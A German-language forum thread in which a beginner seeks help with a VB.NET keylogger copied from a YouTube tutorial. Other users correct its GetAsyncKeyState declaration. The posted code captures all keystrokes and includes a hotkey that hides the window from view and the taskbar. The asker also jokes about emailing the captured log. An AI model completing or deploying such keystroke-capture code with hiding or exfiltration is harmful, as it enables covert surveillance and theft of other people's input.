Zum Inhalt springen

VB.NET: keylogger


screamboy14

Empfohlene Beiträge

hallo und zwar ich wollt mir mal ein wenigs vb beibringen (youtubetoturials)

und wollte mir einen keylogger mal so aus spaß programieren

das problem ist allerdings das was ich eingebe wird nicht angezeigt im programmfenster

kann mir einer sagen wieso??

ich >>vermute<<< ja das es an folgendem textteil liegt

Private Declare Function GetAsyncKeyState Lib "User32" (ByVal vKey As Long) As Integer

(wegen dem user32) wenn es daran liegt wer kann mir denn sagen, wie ich herausfinde was ich da anstelle dessen hinschreiben müsste

da es sich um ein youtube toturial handelt finde ich es sinnvoll einmal dieses kurz zu posten damit ihr im bilde seid

YouTube - Visual Basic 2008 Tutorial #4: Keylogger

vielen dank schoneinmal im Vorraus :)

Link zu diesem Kommentar
Auf anderen Seiten teilen

Nö, daran liegt's nicht.

und woran liegt es dann ich kann ja gerne nochmal den TIMER code posten für die die das youtube nicht sehen möchten :)

Public Class Form1

Private Declare Function GetAsyncKeyState Lib "User32" (ByVal vKey As Long) As Integer

Dim Ascicode As Integer

Dim Eingabe As Integer

Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick

For i = 1 To 255

Eingabe = GetAsyncKeyState(i)

If Eingabe = -32767 Then

Me.TextBox1.Text = TextBox1.Text + Chr(i)

If i = 8 Then TextBox1.Text = TextBox1.Text + "Backspace"

If i = 122 Then Clipboard.SetText(TextBox1.Text)

If i = 115 Then

Me.Opacity = 0

Me.ShowInTaskbar = False

End If

If i = 119 Then

Me.Opacity = 100

Me.ShowInTaskbar = True

End If

End If

Next

End Sub

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load

Timer1.Start()

End Sub

End Class

Link zu diesem Kommentar
Auf anderen Seiten teilen

Ich glaube übrigens nicht, dass du daraus irgendetwas lernst.

aso ok ich gug mr das mal an

und naja bei dm video direkt jetz nicht michhat das thema nur so interessiert aber bei den anderen toturials kann man durchaus was lernen weil da wird es auch besser erklährt und ich denk mal bei nen keylogger das wurde normal erklährt auch bissel länger dauern als 9 min :) aber ich weiß was du meinst ^^

Link zu diesem Kommentar
Auf anderen Seiten teilen

Nicht alles, was sich im Internet findet, ist richtig. Das gilt insbesondere auch für irgendwelche Youtube-Videos von Kindern, die selbst nicht genau wissen, was sie da tun.

ja das stimmt aber ich kann an der signatur kein fehler sehen (naja vill kenn ich mich mit der asinc.... auch nur nicht gut genug aus ) aber das is doch nur die eingabe der befehl was muss ich da denn ändern damit es funktioniert

Link zu diesem Kommentar
Auf anderen Seiten teilen

wie muss ich denn meine signatur verändern, damit es geht ??
Ich sagte doch, das Programm funktioniert bei mir. Wenn es das bei dir nicht tut, liegt es jedenfalls nicht am Code.

Einen Keylogger mit GetAsyncKeyState zu implementieren, ist auch eher Sandkastenniveau. Das geht nämlich in die Hose, wenn ein anderes Programm das gleichzeitig auch versucht. Vielleicht läuft ja bei dir schon so ein Möchtegern-Keylogger im Hintergrund?

Link zu diesem Kommentar
Auf anderen Seiten teilen

Ich sagte doch, das Programm funktioniert bei mir.

ja bei mir nicht ^^ ich dachte zuerste das es an win 7 liegt und hab mir 2010 ultimate gedownloaddet wil dies angeblich abhilfe schaffen soll ...

aber das einzige was anders is is das jet diese fehlermeldung kommt

Ein Aufruf an die PInvoke-Funktion "keylogger!WindowsApplication1.Form1::GetAsyncKeyState" hat das Gleichgewicht des Stapels gestört. Wahrscheinlich stimmt die verwaltete PInvoke-Signatur nicht mit der nicht verwalteten Zielsignatur überein. Überprüfen Sie, ob die Aufrufkonvention und die Parameter der PInvoke-Signatur mit der nicht verwalteten Zielsignatur übereinstimmen.

Link zu diesem Kommentar
Auf anderen Seiten teilen

ich dachte zuerste das es an win 7 liegt und hab mir 2010 ultimate gedownloaddet wil dies angeblich abhilfe schaffen soll ...
Die Professional-Edition hätte für deine Zwecke sicher auch ausgereicht :rolleyes:

Überprüfen Sie, ob die Aufrufkonvention und die Parameter der PInvoke-Signatur mit der nicht verwalteten Zielsignatur übereinstimmen.
Der Parameter muss vom Typ Int32 sein, und der Rückgabewert Int16.
Link zu diesem Kommentar
Auf anderen Seiten teilen

Die Professional-Edition hätte für deine Zwecke sicher auch ausgereicht :rolleyes:

Der Parameter muss vom Typ Int32 sein, und der Rückgabewert Int16.

naja ich bekomm die software gratis mit originalkey von daher ^^

und wie mache ich das in ein int32 bzw 16 ??? ich kenn nur normal int

Link zu diesem Kommentar
Auf anderen Seiten teilen

wenn man visual studio instaliert beim ersten start muss man ja einstellen in welcher sprache man schreiben möchte

Meinst du die Auswahl des Keyboard Mapping? Das wirkt sich nur darauf aus, welche Befehle mit welchen Tastatur-Shortcuts belegt werden. Du kannst das in den Optionen unter Environment > Keyboard umstellen.

Link zu diesem Kommentar
Auf anderen Seiten teilen

Also...

1. Ich hasse diese Youtube Turorials WEIL

1.1 sie völlig sinnlos sind

1.2 die codes meistens irgendwo rauskopiert sind...

2. Wenn du Vista oder Windows 7 hast, dann is es kein Wunder das es nicht geht... Wie gesagt.. Die dummen Youtube VB Turorials verblöden die Leute...

3. Hier der richtige Code

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short

Viel spaß damit

Radprog

PS: Hab mir für diese Frage extra ein account zugelegt -_-'

Link zu diesem Kommentar
Auf anderen Seiten teilen

Also...

3. Hier der richtige Code

Private Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As Integer) As Short

Viel spaß damit

Radprog

PS: Hab mir für diese Frage extra ein account zugelegt -_-'

hihi danke das du das extra gemacht hast aber ich hab es ja dank der hir bereits registrierten user den fehler ja auch entdeckt ^^ mit dem int :) danke nochmal =)

jetz müsste ich nurnoch wissen, wie man es in eine externe datei speichern kann und per email verschicken xD

ok spaß mir reicht das in externe txt datei speichern das bietet youtube nur für c# ^^

wer mag kann mir den rest auch schreiben xPP

ps manche toturials sind auch nicht zu gebrauchen aber wenn man sich mal z.b. das für java ansieht das ist relativ alles das selbe was ich am Anfang meiner Ausbildung hatte ^^ ich finde es kommt immer darauf an von wen das Toturial is :)

Bearbeitet von screamboy14
Link zu diesem Kommentar
Auf anderen Seiten teilen

Dein Kommentar

Du kannst jetzt schreiben und Dich später registrieren. Wenn Du ein Konto hast, melde Dich jetzt an, um unter Deinem Benutzernamen zu schreiben.

Gast
Auf dieses Thema antworten...

×   Du hast formatierten Text eingefügt.   Formatierung wiederherstellen

  Nur 75 Emojis sind erlaubt.

×   Dein Link wurde automatisch eingebettet.   Einbetten rückgängig machen und als Link darstellen

×   Dein vorheriger Inhalt wurde wiederhergestellt.   Editor leeren

×   Du kannst Bilder nicht direkt einfügen. Lade Bilder hoch oder lade sie von einer URL.

Fachinformatiker.de, 2024 by SE Internet Services

fidelogo_small.png

Schicke uns eine Nachricht!

Fachinformatiker.de ist die größte IT-Community
rund um Ausbildung, Job, Weiterbildung für IT-Fachkräfte.

Fachinformatiker.de App

Download on the App Store
Get it on Google Play

Kontakt

Hier werben?
Oder sende eine E-Mail an

Social media u. feeds

Jobboard für Fachinformatiker und IT-Fachkräfte

×
×
  • Neu erstellen...